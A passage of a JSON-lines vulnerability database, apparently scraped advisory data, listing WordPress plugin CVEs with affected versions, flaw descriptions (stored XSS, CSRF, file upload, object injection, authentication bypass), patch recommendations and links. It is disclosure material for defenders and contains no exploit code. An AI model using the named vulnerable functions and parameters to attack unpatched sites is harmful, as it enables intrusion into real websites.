version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a297784-96cd-4135-a8f1-e50f3a0d71bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a297784-96cd-4135-a8f1-e50f3a0d71bd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/one-click-order-reorder\\\/trunk\\\/includes\\\/class-basket-order.php#L489\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/one-click-order-reorder\\\/trunk\\\/includes\\\/class-basket-order.php#L489\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110914\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110914\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5707","slug":"seo-slider","versionImpact":"1.1.0","versionEndExcluding":"1.1.1","description":"The SEO Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'slider' shortcode and post meta in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-slider\\\/trunk\\\/includes\\\/shortcode.php?rev=2367856#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-slider\\\/trunk\\\/includes\\\/shortcode.php?rev=2367856#L68\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2987802\\\/seo-slider#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2987802\\\/seo-slider#file3\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32bc88a7-93ed-4d67-9383-b6d935a0df4d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32bc88a7-93ed-4d67-9383-b6d935a0df4d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-slider\\\/trunk\\\/includes\\\/shortcode.php?rev=2367856#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-slider\\\/trunk\\\/includes\\\/shortcode.php?rev=2367856#L71\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4821","slug":"drag-and-drop-multiple-file-upload-for-woocommerce","versionImpact":"1.1.0","versionEndExcluding":"1.1.1","description":"The Drag and Drop Multiple File Upload for WooCommerce WordPress plugin before 1.1.1 does not filter all potentially dangerous file extensions. Therefore, an attacker can upload unsafe .shtml or .svg files containing malicious scripts.","recommendation":"Update to version 1.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ac0853b-03f7-44b9-aa9b-72df3e01a9b5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ac0853b-03f7-44b9-aa9b-72df3e01a9b5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8433","slug":"themehunk-megamenu-plus","versionImpact":"1.1.0","versionEndExcluding":"1.1.1","description":"The Easy Mega Menu Plugin for WordPress \u2013 ThemeHunk plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018themehunk_megamenu_bg_image' parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Please note that this was partially fixed in 1.1.0 due to the missing authorization protection that was added.","recommendation":"Update to version 1.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc661cfd-6290-4b36-858a-cf2269b5fcf9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc661cfd-6290-4b36-858a-cf2269b5fcf9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themehunk-megamenu-plus\\\/trunk\\\/inc\\\/megamenu-base.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themehunk-megamenu-plus\\\/trunk\\\/inc\\\/megamenu-base.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/views\\\/admin\\\/item_settings.php?rev=3156084#L196\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/views\\\/admin\\\/item_settings.php?rev=3156084#L196\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3163871%40themehunk-megamenu-plus&new=3163871%40themehunk-megamenu-plus&sfp_email=&sfph_mail=#file21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3163871%40themehunk-megamenu-plus&new=3163871%40themehunk-megamenu-plus&sfp_email=&sfph_mail=#file21\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5085","slug":"hash-form","versionImpact":"1.1.0","versionEndExcluding":"1.1.1","description":"The Hash Form \u2013 Drag & Drop Form Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1.0 via deserialization of untrusted input in the 'process_entry' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0166a2b2-24e2-4dd6-8842-d3e8dd7bb0dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0166a2b2-24e2-4dd6-8842-d3e8dd7bb0dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-form\\\/trunk\\\/admin\\\/classes\\\/HashFormEntry.php#L353\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-form\\\/trunk\\\/admin\\\/classes\\\/HashFormEntry.php#L353\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090341\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090341\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5084","slug":"hash-form","versionImpact":"1.1.0","versionEndExcluding":"1.1.1","description":"The Hash Form \u2013 Drag & Drop Form Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'file_upload_action' function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eef9e2fa-d8f0-42bf-95ac-ee4cafff0b14?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eef9e2fa-d8f0-42bf-95ac-ee4cafff0b14?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-form\\\/trunk\\\/admin\\\/classes\\\/HashFormBuilder.php#L764\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-form\\\/trunk\\\/admin\\\/classes\\\/HashFormBuilder.php#L764\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090341\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090341\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36746","slug":"menu-swapper","versionEndExcluding":"1.1.1","description":"The Menu Swapper plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.0.2. This is due to missing or incorrect nonce validation on the mswp_save_meta() function. This makes it possible for unauthenticated attackers to save meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368729%40menu-swapper&new=2368729%40menu-swapper&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368729%40menu-swapper&new=2368729%40menu-swapper&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49a04155-9fa8-45e0-b80b-3836d5271fa7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49a04155-9fa8-45e0-b80b-3836d5271fa7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10563","slug":"woo-cart-count-shortcode","versionImpact":"1.0.4","versionEndExcluding":"1.1.0","description":"The WooCommerce Cart Count Shortcode WordPress plugin before 1.1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/08ed69f6-9c9b-4548-9dbb-05b602530ef7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/08ed69f6-9c9b-4548-9dbb-05b602530ef7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11615","slug":"envolve-plugin","versionImpact":"1.0","versionEndExcluding":"1.1.0","description":"The Envolve Plugin plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 1.0 via the 'zetra_deleteLanguageFile' and 'zetra_deleteFontsFile' functions. This is due to the plugin not properly validating a file or its path prior to deleting it. This makes it possible for unauthenticated attackers to delete language files.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/envolve-consulting-business-wordpress-theme\\\/28748459\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/envolve-consulting-business-wordpress-theme\\\/28748459\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05909e9c-4f57-4556-bae9-b0b63a9a43ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05909e9c-4f57-4556-bae9-b0b63a9a43ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4837","slug":"cpo-companion","versionEndExcluding":"1.1.0","description":"The CPO Companion WordPress plugin before 1.1.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/41abeacb-ef3e-4621-89bb-df0f2eb617da\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/41abeacb-ef3e-4621-89bb-df0f2eb617da\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11617","slug":"envolve-plugin","versionImpact":"1.0","versionEndExcluding":"1.1.0","description":"The Envolve Plugin plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'zetra_languageUpload' and 'zetra_fontsUpload' functions in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/envolve-consulting-business-wordpress-theme\\\/28748459\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/envolve-consulting-business-wordpress-theme\\\/28748459\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0ad02d9-546f-4bcb-b567-785e3acfb489?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0ad02d9-546f-4bcb-b567-785e3acfb489?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-31290","slug":"demo-my-wordpress","versionImpact":"1.0.9.1","versionEndExcluding":"1.1.0","description":"Improper Privilege Management vulnerability in CodeRevolution Demo My WordPress allows Privilege Escalation.This issue affects Demo My WordPress: from n\/a through 1.0.9.1.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/demo-my-wordpress\\\/wordpress-demo-my-wordpress-plugin-1-0-9-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/demo-my-wordpress\\\/wordpress-demo-my-wordpress-plugin-1-0-9-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4272","slug":"support-svg","versionImpact":"1.0.0","versionEndExcluding":"1.1.0","description":"The Support SVG  WordPress plugin before 1.1.0 does not sanitize SVG file contents, which enables users with at least the author role to SVG with malicious JavaScript to conduct Stored XSS attacks.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ed1b1540-a0e2-434e-8769-9532c3ed5e31\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ed1b1540-a0e2-434e-8769-9532c3ed5e31\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0499","slug":"quickswish","versionEndExcluding":"1.1.0","description":"The QuickSwish WordPress plugin before 1.1.0 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9342470a-a0ad-4f0b-b95f-7daa39a6362b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9342470a-a0ad-4f0b-b95f-7daa39a6362b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13523","slug":"memorialday","versionImpact":"1.0.4","versionEndExcluding":"1.1.0","description":"The MemorialDay plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.4. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3232363%40memorialday%2Ftrunk&old=3207291%40memorialday%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3232363%40memorialday%2Ftrunk&old=3207291%40memorialday%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96cec16e-7bb3-4279-8c17-eca88d413ad8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96cec16e-7bb3-4279-8c17-eca88d413ad8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11028","slug":"multimanager-wp","versionImpact":"1.0.5","versionEndExcluding":"1.1.0","description":"The MultiManager WP \u2013 Manage All Your WordPress Sites Easily plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.0.5. This is due to the user impersonation feature inappropriately determining the current user via user-supplied input. This makes it possible for unauthenticated attackers to generate an impersonation link that will allow them to log in as any existing user, such as an administrator. NOTE: The user impersonation feature was disabled in version 1.1.0 and re-enabled with a patch in version 1.1.2.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de8e7adc-3777-4fb1-a708-68da950e3d4f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de8e7adc-3777-4fb1-a708-68da950e3d4f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184657\\\/multimanager-wp\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184657\\\/multimanager-wp\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184678\\\/multimanager-wp\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184678\\\/multimanager-wp\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184826\\\/multimanager-wp\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184826\\\/multimanager-wp\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3387","slug":"lana-text-to-image","versionEndExcluding":"1.1.0","description":"The Lana Text to Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'lana_text_to_image' and 'lana_text_to_img' shortcode in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2929913\\\/lana-text-to-image\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2929913\\\/lana-text-to-image\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lana-text-to-image\\\/tags\\\/1.0.0\\\/lana-text-to-image.php#L97\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lana-text-to-image\\\/tags\\\/1.0.0\\\/lana-text-to-image.php#L97\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8acb7893-85b2-404a-b3fe-b4c1a835b3eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8acb7893-85b2-404a-b3fe-b4c1a835b3eb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0605","slug":"auto-rename-media-on-upload","versionEndExcluding":"1.1.0","description":"The Auto Rename Media On Upload WordPress plugin before 1.1.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/57267c3c-d55e-4b37-a6d0-c5cd8569625c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/57267c3c-d55e-4b37-a6d0-c5cd8569625c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7985","slug":"fileorganizer","versionImpact":"1.0.9","versionEndExcluding":"1.1.0","description":"The FileOrganizer \u2013 Manage WordPress and Website Files plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the \"fileorganizer_ajax_handler\" function in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, and permissions granted by an administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible. NOTE: The FileOrganizer Pro plugin must be installed and active to allow Subscriber+ users to upload files.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f79164c2-be3b-496d-b747-3e4b60b7fc2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f79164c2-be3b-496d-b747-3e4b60b7fc2b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fileorganizer\\\/trunk\\\/main\\\/ajax.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fileorganizer\\\/trunk\\\/main\\\/ajax.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149878\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149878\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8434","slug":"themehunk-megamenu-plus","versionImpact":"1.0.9","versionEndExcluding":"1.1.0","description":"The Easy Mega Menu Plugin for WordPress \u2013 ThemeHunk plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several functions hooked via AJAX in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform actions like updating plugin settings.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be3869a9-f72d-4bbb-ba51-d2761ca761f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be3869a9-f72d-4bbb-ba51-d2761ca761f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156084\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/inc\\\/megamenu-base.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156084\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/inc\\\/megamenu-base.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156084\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/inc\\\/megamenu-setting.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156084\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/inc\\\/megamenu-setting.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156084\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/inc\\\/megamenu-nav-menu-settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156084\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/inc\\\/megamenu-nav-menu-settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156084\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/inc\\\/megamenu-widgets.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156084\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/inc\\\/megamenu-widgets.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9706","slug":"ultimate-coming-soon","versionImpact":"1.0.9","versionEndExcluding":"1.1.0","description":"The Ultimate Coming Soon & Maintenance plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ucsm_activate_lite_template_lite function in all versions up to, and including, 1.0.9. This makes it possible for unauthenticated attackers to change the template used for the coming soon \/ maintenance page.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-coming-soon\\\/trunk\\\/backend\\\/tabs-content\\\/templates\\\/frontend-part\\\/display-template.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-coming-soon\\\/trunk\\\/backend\\\/tabs-content\\\/templates\\\/frontend-part\\\/display-template.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a535eb7f-5ec7-4b3b-b46f-4f09434d04b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a535eb7f-5ec7-4b3b-b46f-4f09434d04b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9705","slug":"ultimate-coming-soon","versionImpact":"1.0.9","versionEndExcluding":"1.1.0","description":"The Ultimate Coming Soon & Maintenance plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ucsm_update_template_name_lite' function in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the name of the plugin's templates.","recommendation":"Update to version 1.1.0, or a newer patched 